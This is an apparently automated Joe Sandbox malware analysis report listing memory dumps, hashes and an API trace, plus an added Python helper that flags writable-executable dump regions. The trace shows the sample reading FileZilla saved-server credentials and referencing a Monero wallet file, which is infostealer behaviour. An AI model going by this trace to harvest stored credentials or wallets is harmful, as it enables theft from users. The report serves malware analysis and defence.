                                • Instruction ID: 25df46dfa144a44589700fe0c6fa855d51012908b3a42f6c10964e008c7f1089
                                • Opcode Fuzzy Hash: c2ca7ab94b7ca8c63032a9e6c8cc7a3783245fad8a27454cb31985543e2ae72e
                                • Instruction Fuzzy Hash: 794177F3A19208ABF3085939EC45777B7CAD7D4320F2A423EEA59D7384EC759C064194
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 5P
                                • API String ID: 0-607277257
                                • Opcode ID: 5e81c5862f313f1d7d83b9bbc9df777cdede8fb4ad44bec4aa36e3e451e42c57
                                • Instruction ID: 8bd782e5a934702efb2b9ac03531e2a383ada8cdc4fae58fd262fa788ff4e76a
                                • Opcode Fuzzy Hash: 5e81c5862f313f1d7d83b9bbc9df777cdede8fb4ad44bec4aa36e3e451e42c57
                                • Instruction Fuzzy Hash: DE41F2B358C700DFE3046E29D88077AFFE4EB94710F26493DDAC246704E6351881A687
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: "/
                                • API String ID: 0-2465596502
                                • Opcode ID: 32bce0da29250b1edf5853fde0fca586422bc575ef39ef93c39ea761e4f0f1fd
                                • Instruction ID: 03df2a5ea82d363cc21b7466d4859217a93656b5b7f36cb0f684c8943aec7112
                                • Opcode Fuzzy Hash: 32bce0da29250b1edf5853fde0fca586422bc575ef39ef93c39ea761e4f0f1fd
                                • Instruction Fuzzy Hash: 01316DF3A082049FE304BA39EC8537BF7D5EBE4210F1A463DDA95C3784F97958068246
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e63e96ad35b3aa1c0abcf20c580146f7cfec02203b2631de000d26331bbca26e
                                • Instruction ID: da5f5b7b8bb5796392107d082bbc48a04b8a66ad3ceeb6053eaf2f1b205a866e
                                • Opcode Fuzzy Hash: e63e96ad35b3aa1c0abcf20c580146f7cfec02203b2631de000d26331bbca26e
                                • Instruction Fuzzy Hash: C27191F3E086149FE3006E28DC8576ABBE5EF94320F1A863DDAC897744E67558458783
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2f1775cd137ba77fcda63fa65fd65cffcf950615b604b2a8d3699c789a8a1a41
                                • Instruction ID: 75cf3e78127dd1726eaf7b4041fe586392a9f126f32b5ddc0d1d8fc02a76dc76
                                • Opcode Fuzzy Hash: 2f1775cd137ba77fcda63fa65fd65cffcf950615b604b2a8d3699c789a8a1a41
                                • Instruction Fuzzy Hash: F85125B3A087109BE304DE2AEC4453BF7E9EFD0620F2A863DE5C587340EA349C058652
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f3a45a38238214aaef0f5cc59ae94ffea3a76734eb8530b42cfb96fd83278bcd
                                • Instruction ID: eb8ca2a7b4c52219a216a61c1884abeaf8d6699eb61a88def35140971728af15
                                • Opcode Fuzzy Hash: f3a45a38238214aaef0f5cc59ae94ffea3a76734eb8530b42cfb96fd83278bcd
                                • Instruction Fuzzy Hash: 25414BF3908204AFE7056E59ECD1B7AF7E5FB68720F19053DEAC183700E57558118693
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0d84fb13a34bccb3ffc0fa309f4f8212d2fd11f445e48bcc341a9b5d96573722
                                • Instruction ID: 75bdc613e043659c7944a870793854d5fab2939475e2c75c752ecf48274edc7d
                                • Opcode Fuzzy Hash: 0d84fb13a34bccb3ffc0fa309f4f8212d2fd11f445e48bcc341a9b5d96573722
                                • Instruction Fuzzy Hash: 4041C4F3A081005BE344AE2DDC45B2AB7EAEBD4315F1B853DDAC4C7788E93498068697
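                                The memory dump names listed under each Memory Dump Source record encode, among other fields, the region's base address (the 16-digit field) and its page protection (the field after it: 0x04, 0x40 or 0x80 on this page). Pasting those lines into the helper below groups the dumped regions of the 00B70000 image by protection and flags the ones that were executable and writable at dump time, which is the evidence a practitioner wants when checking a report for in-place unpacking. This is an added example, not Joe Sandbox code: the position of the base and protection fields, and the reading of the 01000000 field as MEM_IMAGE, are inferred from the names on this page and from the winnt.h constants; the remaining fields are treated as opaque, and the sample report text is a constructed excerpt of lines from this page.

```python
"""Decode Joe Sandbox .sdmp dump names and flag executable+writable regions.

Added example, not Joe Sandbox code.  Field meanings are inferred from the
names on this report and from winnt.h; fields marked opaque are not decoded.
"""
import re
from dataclasses import dataclass

# Page-protection values from winnt.h (low byte of the protection field).
PROTECTION_NAMES = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
MEM_IMAGE = 0x1000000  # winnt.h: region backed by an image section (assumed meaning of field 6)

# Eight dot-separated hex fields followed by ".sdmp".  No trailing boundary, because
# the HTML report glues the "Download File" link text directly onto the name.
SDMP_RE = re.compile(r"(?<![0-9A-Fa-f.])((?:[0-9A-Fa-f]+\.){8}sdmp)")


@dataclass(frozen=True)
class DumpRegion:
    name: str
    process_index: int   # field 0 (assumed: process slot in the analysis)
    phase: int           # field 1 (assumed: analysis phase)
    dump_id: str         # field 2 (opaque identifier, kept verbatim)
    base: int            # field 3: virtual base address of the dumped region
    protect: int         # field 4: page protection, winnt.h values
    region_type: int     # field 6; fields 5 and 7 are opaque and not decoded

    @property
    def protection_name(self) -> str:
        return PROTECTION_NAMES.get(self.protect & 0xFF, f"0x{self.protect:X}")

    @property
    def is_image(self) -> bool:
        return self.region_type == MEM_IMAGE

    @property
    def is_writable_executable(self) -> bool:
        # Both forms allow bytes to be written and then executed in place;
        # 0x40 is the one that never appears on an untouched image mapping.
        return (self.protect & 0xFF) in (PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY)


def parse_sdmp_name(name: str) -> DumpRegion:
    """Split one dump name into its fields; raises ValueError on anything else."""
    parts = name.strip().split(".")
    if len(parts) != 9 or parts[8] != "sdmp":
        raise ValueError(f"not an sdmp name: {name!r}")
    return DumpRegion(
        name=name.strip(),
        process_index=int(parts[0], 16),
        phase=int(parts[1], 16),
        dump_id=parts[2],
        base=int(parts[3], 16),
        protect=int(parts[4], 16),
        region_type=int(parts[6], 16),
    )


def extract_sdmp_names(text: str) -> list[str]:
    """Every distinct dump name in raw report text, in order of first appearance."""
    seen: set[str] = set()
    out: list[str] = []
    for m in SDMP_RE.finditer(text):
        if m.group(1) not in seen:
            seen.add(m.group(1))
            out.append(m.group(1))
    return out


def region_map(text: str) -> list[DumpRegion]:
    """All dumped regions named in the text, sorted by base address."""
    return sorted((parse_sdmp_name(n) for n in extract_sdmp_names(text)), key=lambda r: r.base)


def rwx_regions(text: str) -> list[DumpRegion]:
    """Regions dumped with PAGE_EXECUTE_READWRITE: section rights changed at runtime."""
    return [r for r in region_map(text) if (r.protect & 0xFF) == PAGE_EXECUTE_READWRITE]


def summarize(text: str) -> list[str]:
    """One line per region: base, protection name, image flag."""
    return [f"0x{r.base:08X} {r.protection_name:<24} image={r.is_image}" for r in region_map(text)]


# Constructed excerpt of the Memory Dump Source lines from this report, including
# the glued "Download File" text and one name that appears twice.
SAMPLE_REPORT = """\
Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmpDownload File
"""

if __name__ == "__main__":
    print("\n".join(summarize(SAMPLE_REPORT)))
    print("RWX regions:", [hex(r.base) for r in rwx_regions(SAMPLE_REPORT)])
```

The PE header region at 0x00B70000 comes out as PAGE_READWRITE and the two 0x80 regions as PAGE_EXECUTE_WRITECOPY, which is what an image section marked writable and executable in its section header maps to; the PAGE_EXECUTE_READWRITE regions are the ones whose rights were changed after mapping, so those are the dumps to load first when looking for the unpacked code.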
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b7399cf23c0de40e677fe88cc7bba56866c709632d609ee8f699ee9c0a5096a2
                                • Instruction ID: 6ff203abce3c04efb8b2619e57ef1f39e23c71ae7a0e293df3bfdc3c8b0c6def
                                • Opcode Fuzzy Hash: b7399cf23c0de40e677fe88cc7bba56866c709632d609ee8f699ee9c0a5096a2
                                • Instruction Fuzzy Hash: 9241E4F3E186149BE7146A29EC9677AB7E9DF94310F0B053DDB85D3384E939980086CA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                APIs
                                  • Part of subcall function 00B8A740: lstrcpy.KERNEL32(00B90E17,00000000), ref: 00B8A788
                                  • Part of subcall function 00B88DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00B88E0B
                                  • Part of subcall function 00B8A920: lstrcpy.KERNEL32(00000000,?), ref: 00B8A972
                                  • Part of subcall function 00B8A920: lstrcat.KERNEL32(00000000), ref: 00B8A982
                                  • Part of subcall function 00B8A8A0: lstrcpy.KERNEL32(?,00B90E17), ref: 00B8A905
                                  • Part of subcall function 00B8A9B0: lstrlen.KERNEL32(?,00938A70,?,\Monero\wallet.keys,00B90E17), ref: 00B8A9C5
                                  • Part of subcall function 00B8A9B0: lstrcpy.KERNEL32(00000000), ref: 00B8AA04
                                  • Part of subcall function 00B8A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B8AA12
                                  • Part of subcall function 00B8A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B8A7E6
                                  • Part of subcall function 00B799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00B799EC
                                  • Part of subcall function 00B799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00B79A11
                                  • Part of subcall function 00B799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00B79A31
                                  • Part of subcall function 00B799C0: ReadFile.KERNEL32(000000FF,?,00000000,00B7148F,00000000), ref: 00B79A5A
                                  • Part of subcall function 00B799C0: LocalFree.KERNEL32(00B7148F), ref: 00B79A90
                                  • Part of subcall function 00B799C0: CloseHandle.KERNEL32(000000FF), ref: 00B79A9A
                                  • Part of subcall function 00B88E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00B88E52
                                • GetProcessHeap.KERNEL32(00000000,000F423F,00B90DBA,00B90DB7,00B90DB6,00B90DB3), ref: 00B80362
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00B80369
                                • StrStrA.SHLWAPI(00000000,<Host>), ref: 00B80385
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B90DB2), ref: 00B80393
                                • StrStrA.SHLWAPI(00000000,<Port>), ref: 00B803CF
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B90DB2), ref: 00B803DD
                                • StrStrA.SHLWAPI(00000000,<User>), ref: 00B80419
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B90DB2), ref: 00B80427
                                • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00B80463
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B90DB2), ref: 00B80475
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B90DB2), ref: 00B80502
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B90DB2), ref: 00B8051A
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B90DB2), ref: 00B80532
                                • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B90DB2), ref: 00B8054A
                                • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00B80562
                                • lstrcat.KERNEL32(?,profile: null), ref: 00B80571
                                • lstrcat.KERNEL32(?,url: ), ref: 00B80580
                                • lstrcat.KERNEL32(?,00000000), ref: 00B80593
                                • lstrcat.KERNEL32(?,00B91678), ref: 00B805A2
                                • lstrcat.KERNEL32(?,00000000), ref: 00B805B5
                                • lstrcat.KERNEL32(?,00B9167C), ref: 00B805C4
                                • lstrcat.KERNEL32(?,login: ), ref: 00B805D3
                                • lstrcat.KERNEL32(?,00000000), ref: 00B805E6
                                • lstrcat.KERNEL32(?,00B91688), ref: 00B805F5
                                • lstrcat.KERNEL32(?,password: ), ref: 00B80604
                                • lstrcat.KERNEL32(?,00000000), ref: 00B80617
                                • lstrcat.KERNEL32(?,00B91698), ref: 00B80626
                                • lstrcat.KERNEL32(?,00B9169C), ref: 00B80635
                                • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B90DB2), ref: 00B8068E
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1485597816.0000000000B71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B70000, based on PE: true
                                 • Associated: 00000000.00000002.1485586383.0000000000B70000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C21000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C2D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000C52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485597816.0000000000DBA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000DCE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000000F52000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001039000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.000000000105D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001066000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1485733803.0000000001074000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486112735.0000000001075000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486222235.0000000001217000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1486238168.0000000001218000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_b70000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                • API String ID: 1942843190-555421843
                                • Opcode ID: 96f9abc29e0d622ceb4e353ba6fa53ae625e38470caeabc171c2c3da76a204b3
                                • Instruction ID: cee19ad2ba60704a77a503c48b1f52fc7624cf3ee91bf1b472f7c9a76990c085
                                • Opcode Fuzzy Hash: 96f9abc29e0d622ceb4e353ba6fa53ae625e38470caeabc171c2c3da76a204b3
                                • Instruction Fuzzy Hash: 13D11E75910208EBDB04FBF4DD96EEE73B8AF14300F5445A9F502A61A1DE38AA06DB71
